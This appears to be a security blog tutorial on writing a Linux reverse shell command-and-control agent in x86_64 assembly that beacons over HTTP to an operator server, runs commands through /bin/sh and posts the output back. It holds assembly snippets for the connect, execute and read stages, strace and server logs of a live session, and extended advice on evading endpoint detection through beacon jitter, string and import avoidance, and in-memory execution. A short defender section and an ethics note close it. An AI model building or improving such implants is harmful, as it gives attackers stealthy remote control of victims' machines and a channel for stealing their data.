Post

Building the "Ghost in Machine" - The Assembly HTTP Reverse Shell

Building the "Ghost in Machine" - The Assembly HTTP Reverse Shell

In the world of offensive security, the “Reverse Shell” is often considered the ultimate primitive. It represents the moment where abstract exploitation becomes tangible control. Traditionally, reverse shells are written in Python, Bash, or C — languages that offer convenience, portability, and rapid development. However, those same conveniences come at a cost: predictability.

To truly evade modern EDR (Endpoint Detection and Response) systems and to understand the raw interface between software and the Linux kernel, one must go deeper than userland abstractions.

Enter the Assembly-based HTTP Reverse Shell. This is a command-and-control (C2) agent written entirely in x86_64 Assembly. It doesn’t rely on shared libraries, it doesn’t link against libc, and it avoids the fingerprints left behind by high-level runtimes. What remains is a binary that communicates almost directly with the kernel — a ghost in the machine.

1. The Concept: Why HTTP and Why Assembly?

Most enterprise firewalls are configured under a simple assumption: internal systems should not accept unsolicited inbound connections, but they must be allowed to access the web. Outbound traffic on ports 80 and 443 is almost universally permitted.

A Reverse HTTP Shell exploits this assumption. Instead of waiting for a connection, the compromised machine periodically initiates one itself, reaching out to a remote server and effectively asking, “Do you have any work for me?”

Assembly is chosen not for novelty, but for control. At this level, there are no safety nets, no implicit behavior, and no hidden dependencies.

Benefits for Attackers:

  • Minimal Signature: Without interpreters or runtime loaders, the resulting binary is extremely small — often under 2KB. It lacks imports, symbols, and string tables commonly used by signature-based detection.
  • Direct Kernel Communication: By issuing raw syscalls, the shell bypasses user-land API layers where EDR hooks and instrumentation typically reside.
  • Predictable Execution: The code does exactly what is written — no background threads, no garbage collection, no dynamic linking surprises.

Benefits for Security Researchers:

  • True System Understanding: This approach forces an understanding of how Linux actually executes programs, manages memory, and handles I/O.
  • Detection Insight: By learning how stealthy tools are built, defenders learn where abstractions fail and where monitoring must shift toward behavior.
  • Skill Compression: Mastering this domain improves exploit development, reverse engineering, and kernel-level debugging simultaneously.

2. The Architecture of the Shell

The shell operates in a tight, deterministic loop. There is no event system, no scheduler, and no concurrency — just a repeated sequence of actions that together form a command-and-control lifecycle.

The four stages are:

  1. Beacon (GET): Establish a TCP connection and request instructions from the server.
  2. Parse: Interpret the HTTP response and extract a command payload.
  3. Execute: Run the command using a child process and capture its output.
  4. Exfiltrate (POST): Send the captured output back to the server.

This architecture mirrors that of real-world malware families, albeit in a stripped-down and transparent form. Each stage is independent, which makes reasoning about failure modes and improvements far easier.

3. Deep Dive into the Code

Each stage of the shell corresponds to a specific set of syscalls and memory operations. There is no abstraction layer — every byte matters.

Stage A: The Connection

Networking in Assembly begins with creating a socket manually. This involves invoking sys_socket and constructing a sockaddr_in structure byte by byte in memory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
connect_socket:
    mov rax, 41             ; sys_socket (AF_INET, SOCK_STREAM)
    mov rdi, 2              ; AF_INET
    mov rsi, 1              ; SOCK_STREAM
    syscall
    mov [sock], rax         ; Save the socket file descriptor

    ; Build sockaddr_in (16 bytes) on the stack
    mov rax, 0x0202000a     ; IP 10.0.2.2 (Little Endian)
    shl rax, 16
    mov ax, 0x401f          ; Port 8000 (Big Endian)
    shl rax, 16
    mov ax, 2               ; AF_INET family
    push rax                ; Push onto stack
    
    mov rdi, [sock]         ; Socket FD
    mov rsi, rsp            ; Pointer to our struct on the stack
    mov rdx, 16             ; Size of struct
    mov rax, 42             ; sys_connect
    syscall

At this level, even endianness becomes a concern. IP addresses and ports must be encoded exactly as the kernel expects, or the connection will silently fail.

Stage B: Parsing Content-Length

HTTP is deceptively simple. It is also unforgiving.

To know how much data to read from the socket, the shell must locate the Content-Length: header and convert its ASCII value into a usable integer. This is done manually — byte by byte.

1
2
3
4
5
6
7
8
9
.atoi_loop:
    movzx rbx, byte [rsi]   ; Get one byte of the header
    cmp bl, '0'
    jb .done                ; If not 0-9, we reached the end of the number
    sub bl, '0'             ; Convert ASCII to Integer
    imul rax, 10            ; Shift previous value decimal place
    add rax, rbx            ; Add new digit
    inc rsi
    jmp .atoi_loop

This logic replicates what atoi() does in C — but without error handling, locale support, or safety checks. The benefit is total control and zero dependencies.

Stage C: Capturing the “Ghost” Output

Executing commands is easy. Capturing their output is not.

When /bin/sh runs a command, it writes results to STDOUT and STDERR. To intercept this data, the shell creates a pipe and uses dup2 to redirect the child’s STDOUT into the pipe.

1
2
3
4
5
6
7
8
9
child_exec:
    mov edi, dword [pipe_fds + 4] ; The 'write' end of the pipe
    mov rsi, 1                    ; Redirect STDOUT (1)
    mov rax, 33                   ; sys_dup2
    syscall
    
    ; Execute /bin/sh -c "command"
    mov rax, 59                   ; sys_execve
    ...

This technique is fundamental in Unix internals and appears everywhere — from shells to container runtimes.

Stage D: The Robust Read Loop

Command output is not guaranteed to fit into a single buffer. Long directory listings, errors, or binary output require repeated reads.

1
2
3
4
5
6
7
8
9
10
read_loop:
    mov edi, dword [pipe_fds] ; Read end
    mov rsi, r14              ; Current position in output_buf
    mov rdx, 4096
    xor rax, rax              ; sys_read
    syscall
    test rax, rax
    jle read_done             ; If 0, child is done and pipe is closed
    add r14, rax              ; Move pointer for next chunk
    jmp read_loop

This loop continues until the pipe closes, ensuring no output is lost — a common mistake in amateur shells.

4. Demonstration: From Operator Input to Kernel Reality

To understand how all of these pieces come together, it helps to observe the shell in motion — both from the operator’s perspective and from the kernel’s point of view.

The following demonstration shows a live interaction between the cwww-shell v2.0 server and a connected Assembly-based client, followed by a shortened strace trace of the client process. Together, they illustrate how high-level command execution maps directly to low-level system calls.

Server-Side Interaction

When the server starts, it waits passively for incoming connections. Each command cycle follows the same rhythm: a client connects, receives a command, disconnects, executes locally, then reconnects to return output.

1
2
3
Welcome to the cwww-shell v2.0 by Ivan Nikolskiy / @enty8080

[*] Waiting for connect ... connect from 127.0.0.1:65049

The operator sends a command:

1
2
% pwd
[+] sent.

The client disconnects, executes the command, and reconnects to deliver the result:

1
2
3
[*] Waiting for connect ... connect from 127.0.0.1:65050

/root

The same cycle repeats for another command:

1
2
3
4
5
6
% whoami
[+] sent.

[*] Waiting for connect ... connect from 127.0.0.1:65052

root

From the operator’s perspective, this looks like a simple request/response loop. Behind the scenes, however, the client performs a precise sequence of syscalls to make this possible.

strace Walkthrough

Below is a condensed and annotated view of the client’s strace output during the pwd command. Only the most relevant calls are shown.

1. Beacon and Command Retrieval (GET)

1
2
3
4
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sin_port=htons(8000), sin_addr=10.0.2.2}, 16) = 0
write(3, "GET / HTTP/1.1\r\nHost: 10.0.2.2\r\n", 53) = 53
read(3, "HTTP/1.0 200 OK\r\n...", 8192) = 134

This corresponds directly to:

1
2
[*] Waiting for connect ... connect from 127.0.0.1:65049
% pwd

The client:

  • Creates a TCP socket
  • Connects outbound to the server
  • Sends a minimal HTTP GET request
  • Reads the HTTP response containing the command (pwd)

No libraries are involved — this is raw kernel networking.

2. Pipe Creation and Process Forking

1
2
pipe([4, 5])            = 0
fork()                  = 1615

At this point, the shell prepares to execute the command. The pipe is used to capture output, and fork() creates a child process to run the command safely.

This step is invisible to the server — but essential to producing output.

3. Output Redirection and Command Execution

1
2
3
dup2(5, 1)              = 1
dup2(5, 2)              = 2
execve("/bin/sh", ["/bin/sh", "-c", "pwd"], []) = 0

This is the critical redirection stage:

  • STDOUT and STDERR are redirected into the pipe
  • /bin/sh -c "pwd" is executed

From here on, everything printed by the command flows into the parent process.

4. Reading Command Output

1
write(1, "/root\n", 6)  = 6

This write originates from the shell process, but because STDOUT is redirected, the parent captures it. This data is what eventually appears on the server as:

1
/root

5. Exfiltration via HTTP POST

1
2
3
4
5
6
7
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sin_port=htons(8000)}, 16)   = 0
write(3, "POST / HTTP/1.1\r\nHost: 10.0.2.2\r\n", 49) = 49
write(3, "6", 1)                         = 1
write(3, "\r\n\r\n", 4)                  = 4
write(3, "/root\n", 6)                   = 6
close(3)                                 = 0

This maps directly to the server output:

1
2
[*] Waiting for connect ... connect from 127.0.0.1:65050
/root

The client:

  • Reconnects
  • Sends a minimal HTTP POST
  • Includes the output length and payload
  • Closes the connection cleanly

6. Sleep and Repeat

1
nanosleep({1, 0}, NULL) = 0

This delay prevents tight loops and reduces behavioral noise before the next beacon.

The same syscall pattern repeats for whoami, producing:

1
root

Why This Demonstration Matters

What appears to the operator as a simple interactive shell is, in reality, a carefully orchestrated sequence of kernel interactions:

  • No libraries
  • No persistent connections
  • No shared state
  • No abstractions

Every visible server message corresponds to a syscall. Every syscall corresponds to a design decision made in Assembly.

This is the value of demonstration: it collapses theory into execution and shows, unambiguously, how high-level intent becomes low-level reality.

Nothing is hidden. Nothing is implied.

The system does exactly — and only — what you tell it to do.

5. How to Represent This from Scratch

If you want to build this yourself, resist the urge to start coding immediately. Assembly rewards preparation far more than experimentation. The margin for error is small, and when something breaks, the system rarely tells you why.

Instead, focus on mastering a small set of foundational building blocks. Everything in this shell — and in most low-level tooling — is composed from them.

  1. Syscall Table: Memorize or reference syscall numbers for your architecture. There is no safety net. Unlike higher-level languages, there are no symbolic names at runtime. Calling the wrong syscall number does not raise an exception — it simply invokes the wrong kernel behavior. Keep a reliable syscall reference close, and verify numbers against the kernel version you are targeting.

  2. The Stack: Argument vectors and structures live here. Misalignment causes subtle crashes. The stack is not just temporary storage — it is how arguments are passed to execve, how structures are built, and how control flow is preserved. Incorrect alignment can cause syscalls to fail silently or child processes to crash in ways that are difficult to diagnose. Always be deliberate about what you push and when you clean up.

  3. Register Sanitation: Always zero registers before reuse. Garbage in high bits breaks syscalls. On x86_64, writing to a 32-bit register clears the upper 32 bits — but writing to an 8- or 16-bit register does not. This leads to a common class of bugs where a syscall argument looks correct in the low bits but is corrupted in the high bits. Defensive zeroing is not wasteful — it is survival.

  4. Network Byte Order: Confusing endianness is the fastest way to fail silently. IP addresses, ports, and protocol fields all have strict byte-order requirements. In Assembly, nothing performs conversions for you. A single swapped byte can produce a connection that never completes, with no error message to guide you.

Taken together, these principles form a mental model rather than a checklist. Assembly programming is less about writing instructions and more about maintaining state correctness across time.

Treat Assembly as a language where nothing is implicit. If something works, it is because you made it work. If it fails, the mistake is always yours — and understanding why is where real mastery begins.

6. Operational Considerations: Stability Over Stealth

While the minimalism of an Assembly-based reverse shell offers impressive stealth, real-world usage quickly exposes its limitations. In controlled environments, perfect conditions are often assumed. In real networks, they never exist.

Connections drop. Packets are lost. Servers restart. Firewalls interfere. DNS fails. Any one of these can terminate a fragile agent instantly if it is not designed with failure in mind.

Stealth is meaningless if the process crashes.

True operational viability comes from predictable survival, not clever minimalism. Assembly does not forgive assumptions — it forces every edge case into the open.

Error Handling Is Explicit

High-level languages fail gracefully by default. Exceptions are raised, return values are checked automatically, and many errors are silently retried behind the scenes.

Assembly does none of this.

Every syscall returns a value in RAX. Success is non-negative. Failure is indicated by a negative error code. If that value is ignored, the program will continue execution under false assumptions — often leading to undefined behavior, infinite loops, or segmentation faults.

For example:

1
2
3
syscall
test rax, rax
js fatal_error

This pattern is not optional — it is fundamental. Each syscall must be treated as untrusted. The kernel makes no guarantees beyond returning a number.

A production-grade agent must:

  • Detect failed connect() attempts Network availability is not guaranteed. The agent must recover rather than exit.

  • Implement retry logic with sleep backoff Immediate retries create noisy traffic patterns and waste CPU. Backoff improves both stealth and stability.

  • Handle partial reads and writes Network I/O is not atomic. Assuming full buffers leads to truncated commands or corrupted output.

  • Survive malformed or empty HTTP responses The server may misbehave, return unexpected data, or respond with nothing at all. The agent must reset state and continue.

Each of these concerns adds instructions, branches, and memory usage. The binary grows. The code becomes more complex.

But reliability scales faster than size.

A slightly larger shell that runs for hours is more valuable than a tiny one that crashes in seconds. In operational contexts, stability is stealth — because the quietest process is the one that does not fail.

7. Timing, Jitter, and Behavioral Camouflage

Static beacon intervals are a detection giveaway.

Early malware relied on fixed sleep loops because they were simple to implement. Modern defenses learned that lesson long ago. Today, EDR systems do not need signatures or known indicators — they build behavioral profiles over time. A process that establishes outbound connections at perfectly regular intervals stands out immediately, regardless of what it sends.

A beacon every exactly 5 seconds is not just suspicious — it is mechanical. Real software does not behave that way. Humans do not behave that way. Networks do not behave that way.

Modern detection focuses on:

  • Timing regularity
  • Request periodicity
  • Correlation between process lifetime and network activity

If the timing is predictable, the payload almost doesn’t matter.

Introducing Jitter in Assembly

In high-level languages, adding jitter is trivial. In Assembly, even sleeping requires explicit interaction with the kernel.

Without libc, sleep() is unavailable. Instead, the shell must invoke nanosleep directly and construct a timespec structure manually in memory.

1
2
3
4
mov rax, 35        ; sys_nanosleep
mov rdi, timespec  ; struct timespec*
xor rsi, rsi
syscall

From there, jitter can be introduced by:

  • Modifying the tv_sec and tv_nsec values between iterations
  • Using low-entropy sources such as PID values, stack addresses, or timing drift
  • Varying delays slightly rather than dramatically

The goal is not randomness — it is plausibility.

By randomizing:

  • Beacon intervals Slight variations in sleep time prevent the formation of clean, repeating patterns.

  • HTTP header ordering Real HTTP clients rarely send headers in a perfectly consistent order. Small changes reduce fingerprinting.

  • Payload sizes Commands and responses that vary naturally in length blend into background noise more effectively than fixed-size packets.

Taken together, these changes transform the shell’s behavior from “periodic signal” into “background chatter.” It does not disappear — but it stops announcing itself.

In modern environments, stealth is less about hiding content and more about blending behavior. Jitter is not an enhancement; it is a requirement.

8. Memory Discipline: Avoiding Detection by Absence

One of the strongest advantages of this shell is not what it does, but what it doesn’t do. Modern detection systems are excellent at finding artifacts — they struggle far more with finding nothing.

Most malicious tooling leaves a trail simply by existing. Allocators, loaders, symbol tables, and runtime scaffolding all create recognizable patterns in memory. By writing the agent in pure Assembly, those patterns never materialize.

It avoids:

  • Dynamic memory allocation (malloc) Heap usage introduces metadata, fragmentation, and allocator behavior that can be fingerprinted. Avoiding the heap eliminates an entire class of observable activity.

  • Writable + executable memory (RWX) Pages that are both writable and executable are a high-confidence indicator of exploitation. This shell never needs them. Code is executable, data is not — and the boundary is never crossed.

  • Suspicious imports No libc, no networking libraries, no helper functions. Import tables are often the first thing static scanners examine, and here they are simply absent.

  • Debug symbols There are no function names, no stack traces, and no helpful metadata. What remains is raw control flow and instructions.

  • Strings in .rodata Many signatures rely on hardcoded strings: command paths, headers, error messages. By constructing data dynamically or embedding it minimally, the shell offers very little surface for pattern matching.

Everything lives either:

  • On the stack Short-lived, constantly reused, and overwritten as execution progresses. Stack data rarely persists long enough to be scanned meaningfully.

  • In .bss Static, zero-initialized storage used sparingly and predictably, without allocator noise.

  • Or transient kernel buffers Data that exists only briefly inside the kernel during syscalls — effectively invisible to userland inspection.

This design sharply reduces exposure to:

  • Memory scanners There are no large, persistent regions of interest to inspect.

  • Heuristic YARA rules Without strings, imports, or known structures, heuristic matching becomes unreliable.

  • Userland API hooks By avoiding library calls entirely, the shell bypasses many interception points where EDR products attach themselves.

The result is not invisibility, but silence. There is less to observe, less to fingerprint, and less to reason about. In modern defense, absence is often more powerful than obfuscation.

This is memory discipline not as an optimization — but as a strategy.

9. Detection from the Defender’s Perspective

Understanding how this shell works also reveals how to detect it.

What Doesn’t Work

  • Signature-based AV
  • Import table scanning
  • Static string matching

What Does Work

  • Syscall frequency analysis
  • Unusual parent/child process trees
  • Long-lived network sockets from non-network binaries
  • HTTP clients without TLS stacks or user agents

For defenders, the lesson is clear:

Behavior beats binaries.

10. Extending the Shell Further

Once the fundamentals are in place, this architecture becomes a platform rather than a toy.

Possible extensions include:

  • HTTPS support via raw TLS records
  • File upload/download endpoints
  • In-memory execution (memfd_create)
  • Process migration
  • Encrypted payloads with custom XOR or ChaCha implementations

Each addition increases complexity — but also capability.

11. Why This Matters

Assembly reverse shells are not about practicality. They are about understanding boundaries — the boundaries between user space and kernel space, between abstraction and reality, and between what developers think a system does and what it actually does.

At higher levels of the stack, complexity is hidden behind layers of convenience. Libraries sanitize inputs, runtimes manage memory, and operating systems quietly resolve mistakes. Assembly strips all of that away. Every instruction has intent. Every mistake has consequences. There is no safety net — only behavior.

They teach:

  • Where abstractions leak High-level APIs promise simplicity, but those promises are imperfect. When something fails unexpectedly, the truth is always found beneath the abstraction layer. Assembly forces you to confront that truth directly.

  • How the kernel actually mediates power Files, processes, networks, memory — none of these are “real” until the kernel allows them to exist. Syscalls are the only doorway, and assembly shows exactly how narrow that doorway is.

  • Why modern defenses rely on behavior, not signatures When code becomes small enough, clean enough, and simple enough, there is nothing left to match against. What remains is what the program does, not what it looks like.

  • How small, well-crafted code can outperform massive frameworks A few hundred bytes of deliberate instructions can be more reliable, more transparent, and more predictable than millions of lines of layered software.

Whether you are:

  • Building red-team tooling
  • Reverse engineering malware
  • Writing kernel-level defenses
  • Or simply mastering systems programming

This perspective reshapes how you think about software entirely. It encourages humility toward complexity and respect for fundamentals.

This is not a layer most developers ever see — but it is the layer everything else rests upon.

This is the layer where truth lives.

12. Conclusion: The Ethics of Low-Level Shells

Writing a reverse shell in Assembly is not about being stealthy — it’s about understanding power.

This knowledge must be used responsibly. The same skills that allow you to evade defenses also allow you to build better ones. Ethical use means learning, documenting, and defending — not abusing.

For security professionals, this is foundational literacy, not a weapon.

This post is licensed under CC BY 4.0 by the author.